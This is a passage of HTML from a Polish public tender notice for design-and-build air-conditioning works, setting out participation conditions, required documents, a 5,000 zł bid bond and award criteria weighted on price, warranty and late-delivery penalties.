(w trybie z wolnej ręki) istotne postanowienia przyszłej umowy oZamówienie dodatkowe, ogólne warunki lub wzór takiej umowy (według wyboru Zamawiającego) będąmogły zostać zmienione (negocjowane) w wyniku prowadzonych negocjacji Zamówienia dodatkowego.5. Podając powyższe Zamawiający zastrzega jednocześnie, iż udzielenie Zamówień dodatkowych jestprawem (a nie obowiązkiem) Zamawiającego. Wykonawcy, o którym mowa w ust. 1 niniejszego działunie przysługuje roszczenie o udzielenie mu Zamówienia dodatkowego (tj. zawarcie z nim umowyobejmującej jakąkolwiek część z podanego wyżej zakresu Zamówień dodatkowych). RównieżZamawiającemu nie przysługuje względem Wykonawcy roszczenie o zawarcie z nim takiej umowy naZamówienie dodatkowe.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">230</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Wykonanie zamówienia musi nastąpić w terminie nie dłuższym niż 230dni od zawarcia umowy (szczegółowy opis poszczególnych terminów realizacji przedmiotu zamówieniaokreśla § 3 Wzoru umowy).</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Określenie warunków: O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzyspełniając wymaganie, o którym mowa w ust. 1 niniejszego działu, posiadają jednocześnie zdolnośćzawodową (niezbędne doświadczenie) do wykonania niniejszego zamówienia. Przy uwzględnieniudodatkowych postanowień ust. 3 i 4 niniejszego działu, Zamawiający uzna wskazany w niniejszymustępie warunek udziału w niniejszym postępowaniu za spełniony, jeżeli Wykonawca wykażeZamawiającemu fakt wykonania trzech robót budowlanych, spełniających dodatkowo następującecechy: 1) Każda z trzech robót budowlanych została wykonana (zakończona) w okresie ostatnichpięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu (a jeżeli okresprowadzenia działalności przez Wykonawcę jest krótszy niż pięć lat, to w tym okresie); 2) Każda ztrzech robót budowlanych, o których mowa w pkt 1) powyżej została wykonana należycie, wszczególności zgodnie z przepisami prawa budowlanego i prawidłowo ukończona; 3) Przynajmniejjedna z trzech robót budowlanych, o których mowa w pkt 1) i 2) powyżej były o wartości niemniejszej niż równowartość 120 000 zł (słownie: sto dwadzieścia tysięcy złotych), wykonana była wsystemie zaprojektuj i wybuduj (tj. polegała na wykonaniu projektu budowlanego i na jego podstawiewybudowaniu systemu klimatyzacji). Przez wskazaną w niniejszym punkcie wartość robót,Zamawiający rozumiał będzie kwotę stanowiącą cenę zapłaty (wynagrodzenie) z tytułu umowy owykonanie danej roboty budowlanej pomniejszoną o należny podatek VAT (tym samym wskazanawyżej wartość 120 000 zł jest wartością netto, tj. bez podatku VAT). Kwota 120 000 zł musi dotyczyćsamego systemu klimatyzacji wraz z towarzyszącymi mu robotami z branży sanitarnej, elektrycznej iogólnobudowlanej; 4) Każda z trzech robót budowlanych, o których mowa w pkt 1) - 3) powyżej,obejmowała swoim zakresem wykonanie systemu klimatyzacji wraz z towarzyszącymi mu robotami zbranży sanitarnej, elektrycznej i ogólnobudowlanej. 3. Z zastrzeżeniem wyjątku dopuszczonego w ust.4 pkt 1) niniejszego działu, trzy roboty budowlane wymagane na podstawie ust. 2 niniejszego działumuszą być robotami wykonanymi przez Wykonawcę, a w przypadku Wykonawców, o których mowaw art. 23 ustawy PZP (Wykonawców wspólnie ubiegających się o zamówienie) konieczne jestwykazanie faktu wykonania tych trzech robót przez jednego z Wykonawców wspólnie ubiegających się o zamówienie. 4. Stosownie do postanowień art. 22a ust. 1 ustawy PZP Wykonawca - w celupotwierdzenia spełniania wskazanego w ust. 2 niniejszego działu warunku udziału w niniejszympostępowaniu - może polegać na zdolnościach zawodowych innego podmiotu lub podmiotów (dalejzwanych odpowiednio PODMIOTEM TRZECIM lub PODMIOTAMI TRZECIMI) niezależnie odłączących Wykonawcę z nim stosunków prawnych, pod warunkiem, że Wykonawca taki udowodniZamawiającemu, że realizując zamówienie stanowiące przedmiot niniejszego postępowania będziedysponował niezbędnymi zasobami PODMIOTU lub PODMIOTÓW TRZECICH, w szczególnościprzedstawiając Zamawiającemu zobowiązanie PODMIOTU TRZECIEGO do oddania Wykonawcyniezbędnych zasobów na potrzeby realizacji niniejszego zamówienia. W takim przypadku wymaganebędzie również spełnienie następujących warunków łącznie: 1) W zakresie w jakim Wykonawca przywykazywaniu spełnienia określonego w ust. 2 niniejszego działu warunku udziału w postępowaniupowołuje się na zdolności PODMIOTU TRZECIEGO - roboty budowlane wymagane w ust. 2niniejszego działu będą robotami wykonanymi przez ten PODMIOT TRZECI, przy czym jeżeliWykonawca przy wykazywaniu spełnienia warunku określonego w ust. 2 niniejszego działu (wodniesieniu do trzech robót budowlanych tam wymaganych) powołuje się na zdolności PODMIOTUTRZECIEGO - to wówczas trzy roboty wymagane w ust. 2 niniejszego działu muszą być robotami,które zostały wykonane przez jeden (ten sam) PODMIOT TRZECI; 2) PODMIOT TRZECI, naktórego zdolności przy wykazywaniu spełnienia określonego w ust. 2 niniejszego działu warunkuudziału w niniejszym postępowaniu powołuje się Wykonawca musi być tym podmiotem, który jakopodwykonawca Wykonawcy zrealizuje roboty budowlane stanowiące przedmiot niniejszegozamówienia, do których zdolności te są wymagane. Powyższe będzie rozumiane w ten sposób, że: TenPODMIOT TRZECI, który (stosownie do wykazania przez Wykonawcę) wykonał wymagane w ust. 2niniejszego działu roboty budowlane w zakresie wskazanym w ust. 2 pkt 4) niniejszego działu - jakopodwykonawca zrealizuje minimum część robót budowlanych stanowiących przedmiot niniejszegopostępowania. 3) W stosunku do PODMIOTU TRZECIEGO, o którym mowa w pkt 1) i 2) powyżej,na którego zdolności powołuje się Wykonawca przy wykazywaniu spełnienia warunku udziału wniniejszym postępowaniu nie będą zachodzić podstawy wykluczenia, o których mowa w art. 24 ust. 1pkt 12 - 22 ustawy PZP. 5. Zamawiający informuje, iż zgodnie z art. 24aa ustawy PZP najpierwdokona oceny ofert, a następnie zbada czy Wykonawca, którego oferta została najwyżej ocenionazgodnie z kryteriami oceny ofert, określonymi w SIWZ, nie podlega wykluczeniu oraz spełniaokreślony powyżej w niniejszym dziale warunek udziału w postępowaniu. 6. W zakresienieuregulowanym postanowieniami powyższymi, wykazanie braku podstaw do wykluczenia z udziałuw postępowaniu z przyczyn, o których mowa w art. 24 ust. 1 ustawy PZP oraz wykazanie spełnieniaokreślonego stosownie do ust. 2 - 4 niniejszego działu warunku udziału w niniejszym postępowaniu (jak też badanie i ocena Zamawiającego w tych sprawach) nastąpi zgodnie z właściwymi dla nichprzepisami ustawy PZP oraz z uwzględnieniem postanowień działu VII SIWZ (w tym na podstawiewskazanych tam dokumentów).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Od Wykonawcy oferty najwyżej ocenionej w niniejszym postępowaniu wymagane będą do złożenia, na odrębne wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie (nie krótszymjednak niż 5 dni), następujące dokumenty, aktualne na dzień ich złożenia, potwierdzające, żeWykonawca ten spełnia określony w dziale VI ust. 2 - 4 SIWZ warunek udziału w niniejszympostępowaniu: 1) Wykaz (oświadczenie Wykonawcy) ze wskazaniem trzech robót budowlanych,wymaganych na podstawie działu VI ust. 2 SIWZ, z podaniem w nim w odniesieniu do każdej z tychtrzech robót jej rodzaju, wartości, daty wykonania (ukończenia), miejsca wykonania, a takżepodmiotu/podmiotów, na rzecz których każda z tych robót została wykonana. Wyżej wskazaneinformacje będą wymagały podania w wykazie w takim zakresie, aby pozwalało to Zamawiającemupotwierdzić spełnianie wymogów określonych w dziale VI ust. 2 SIWZ, z wyjątkiem informacji, októrych mowa w dziale VI ust. 2 pkt 2) SIWZ o należytym wykonaniu robót, które to informacjepodlegają wykazaniu w sposób wskazany w pkt 2) poniżej. Zaleca się, aby wezwany (Wykonawcaoferty najwyżej ocenionej) przygotował i złożył ww. wykaz (zwany dalej WYKAZEM) wykorzystującdo tego formularz, którego wzór stanowi Załącznik nr 12 SIWZ; 2) Dowody określające, żewymagane roboty budowlane z WYKAZU spełniają wymóg określony w dziale VI ust. 2 pkt 2)SIWZ. Takimi dowodami są referencje lub inne dokumenty wystawione przez podmiot, na rzeczktórego roboty budowlane były wykonywane, z zastrzeżeniem pkt 3) poniżej; 3) Zamiast wskazanychw pkt 2) powyżej dokumentów potwierdzających należyte wykonanie roboty/robót budowlanych,wystawionych przez podmiot/podmioty, na rzecz których roboty te były wykonywane - Wykonawcamoże przedstawić również inne dokumenty, przy czym tyko wtedy, jeżeli z uzasadnionej przyczyny oobiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów, o których mowa wpkt 2) powyżej. Obowiązek wykazania Zamawiającemu istnienia ww. obiektywnej przyczynystanowiącej przeszkodę w złożeniu dokumentu lub dokumentów wymaganych na podstawie ww. pkt2) niniejszego ustępu, należy do Wykonawcy.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykonawca, który, stosownie do uprawnienia wskazanego w dziale VI ust. 4 SIWZ, wdokumentach składanych wraz z ofertą (stosownie do postanowień ust. 2 niniejszego działu) wskazał,iż polega na zdolnościach PODMIOTU TRZECIEGO przy wykazywaniu spełnienia warunku udziałuw niniejszym postępowaniu określonego w dziale VI ust. 2 SIWZ, obowiązany będzie równieżprzedłożyć Zamawiającemu wraz z ofertą dowód/dowody, że realizując niniejsze zamówienie będziedysponował niezbędnymi zasobami tego PODMIOTU TRZECIEGO, w szczególności zobowiązanie danego PODMIOTU TRZECIEGO do oddania Wykonawcy do dyspozycji niezbędnych zasobów napotrzeby realizacji niniejszego zamówienia. Z przedstawionych dowodów powinno w szczególnościjednoznacznie wynikać, że dany PODMIOT TRZECI zrealizuje niniejsze zamówienie w zakresieminimum wymaganym dla niego w dziale VI ust. 4 pkt 2) SIWZ jako podwykonawca Wykonawcy.Przedkładane Zamawiającemu - w wykonaniu postanowień powyższych niniejszego ustępudokumenty powinny uwzględniać, iż oczekiwanym przez Zamawiającego celem ich przedłożenia jestwykazanie (udowodnienie), że Wykonawca ten na potrzeby realizacji niniejszego zamówienia będziemiał zagwarantowany rzeczywisty (realny) dostęp do posiadanych przez PODMIOT TRZECIzasobów (zdolności) oraz, że zdolności te, poprzez zaangażowanie danego PODMIOTU TRZECIEGOdo realizacji Umowy o zamówienie z niniejszego przetargu w sposób i w zakresie dla niegowymaganym w dziale VI ust. 4 pkt 2) SIWZ, umożliwią Wykonawcy należyte wykonanie niniejszegozamówienia. 2. Po otwarciu ofert, w terminie wskazanym art. 24 ust. 11 ustawy PZP (tj. w terminie 3dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert w niniejszympostępowaniu, o którym mowa w art. 86 ust. 5 ustawy PZP) każdy Wykonawca składa oświadczenie oprzynależności albo braku przynależności do tej samej grupy kapitałowej. W przypadkuprzynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniemdokument bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą dozakłócenia konkurencji w postępowaniu. Wskazane dokumenty są składane na okoliczność brakupodstaw do wykluczenia wskazanych w art. 24 ust. 1 pkt 23 ustawy PZP i są dokumentami, o którychmowa w § 5 pkt 10 rozporządzenia Ministra Rozwoju z 26.07.2016 r. w sprawie rodzajówdokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzieleniezamówienia (Dz. U. z 2016 r. poz. 1126). W myśl art. 24 ust. 1 pkt 23 ustawy PZP, Wykonawcy, którzyzłożą odrębne oferty w niniejszym postępowaniu, a przynależą do tej samej grupy kapitałowej,podlegają wykluczeniu, jeżeli wskazanymi powyżej dokumentami lub informacjami, przedkładanymiZamawiającemu, w związku z oświadczeniem o przynależności do tej samej grupy kapitałowej, niewykażą (nie udowodnią) Zamawiającemu, że istniejące pomiędzy nimi powiązania nie prowadzą dozakłócenia konkurencji w niniejszym postępowaniu. Oświadczenie w przedmiocie przynależności dogrupy kapitałowej (jak też ewentualnie składane dokumenty bądź informacje na okolicznośćpotwierdzenia, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu) podlegają złożeniu na adres (miejsce) doręczeń wskazane w dziale III ust. 5 SIWZ</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. W niniejszym postępowaniu Zamawiający żąda od Wykonawców wniesienia wadium w wysokości5 000 zł (słownie: pięć tysięcy złotych). 2. Zamawiający dopuszcza wniesienie wadium w jednej lubkilku następujących formach: 1) Poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 2)Gwarancjach bankowych; 3) Gwarancjach ubezpieczeniowych; 4) Poręczeniach udzielanych przezpodmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu PolskiejAgencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 i 2260 oraz 2017 r. poz. 1089); 5) Wpieniądzu, wpłaconym przelewem na następujący rachunek bankowy Zamawiającego: Santander BankPolska S.A. Oddział w Szczecinie Nr rachunku: 02 1090 1492 0000 0000 4903 0242 z zalecanymdopiskiem według następującego wzoru: wadium w przetargu ZP/R/BG/344/2018/19 - II. 3. Pod rygoremodrzucenia oferty wadium wnosi się przed upływem terminu składania ofert w niniejszympostępowaniu. Wadium musi być wniesione na czas nie krótszy niż termin związania ofertą wniniejszym postępowaniu (termin ten określają postanowienia działu XII ust. 1 SIWZ). 4. Wadiumwnoszone w pieniądzu uważać się będzie za wniesienie z chwilą kiedy kwota wadium znajdzie się(zostanie uznana na) rachunku, o którym mowa w ust. 2 pkt 5) niniejszego działu. 5. Treść uprawnieńZamawiającego wynikająca z dokumentu wadium wniesionego w formach wskazanych w ust. 2 pkt 1)- 4) niniejszego działu musi wskazywać na niniejsze postępowanie i umożliwiać spieniężenie wadiumna pełną kwotę, bezwarunkowo i nieodwołalnie na pierwsze żądanie zgłoszone przez Zamawiającego(dopuszcza się również wymaganie zgłoszenia żądania w formie pisemnej) w terminie związaniaofertą, przy zajściu przynajmniej jednej z okoliczności wskazanych w ust. 6 i 7 niniejszego działu.Jeżeli dokumenty wadium wniesionego w formach wskazanych w ust. 2 pkt 1) - 4) niniejszego działusporządzone są w języku innym niż polski, należy do nich dołączyć ich tłumaczenie na język polski. 6.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli: 1) Wykonawca, którego oferta zostaławybrana odmówi podpisania Umowy o zamówienie na warunkach określonych w jego ofercie; 2)Wykonawca nie wniósł, wymaganego na podstawie działu XIV SIWZ, zabezpieczenia należytegowykonania umowy (Umowy o zamówienie); 3) Zawarcie z Wykonawcą, którego oferta zostaławybrana Umowy o zamówienie stanie się niemożliwe z przyczyn leżących po stronie tegoWykonawcy. 7. Niezależnie od postanowień ust. 6 niniejszego działu, Zamawiający, na podstawie art.46 ust. 4a ustawy PZP, zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi nawezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy PZP, z przyczyn leżących po jego stronie, niezłożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w mowa w art. 25 ust. 1 ustawy PZP, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy PZP, pełnomocnictw lubnie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy PZP, copowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 8.Z zastrzeżeniem wynikającym z postanowień ust. 6 i 7 niniejszego działu, Zamawiający zwróciWykonawcy wadium wniesione w niniejszym postępowaniu na podstawie i na zasadach określonychw art. 46 ust. 1, 1a., 2 i 4 ustawy PZP. 9. Postanowienia niniejszego działu będą miały zastosowanierównież w sytuacji wskazanej w art. 46 ust. 3 ustawy PZP, z tym, że termin do wniesienia wadiumokreśli Zamawiający w żądaniu do ponownego wniesienia wadium.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji na roboty budowlane i wbudowane materiały</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Wysokość kary umownej za nieterminowe wykonanie przedmiotu zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span 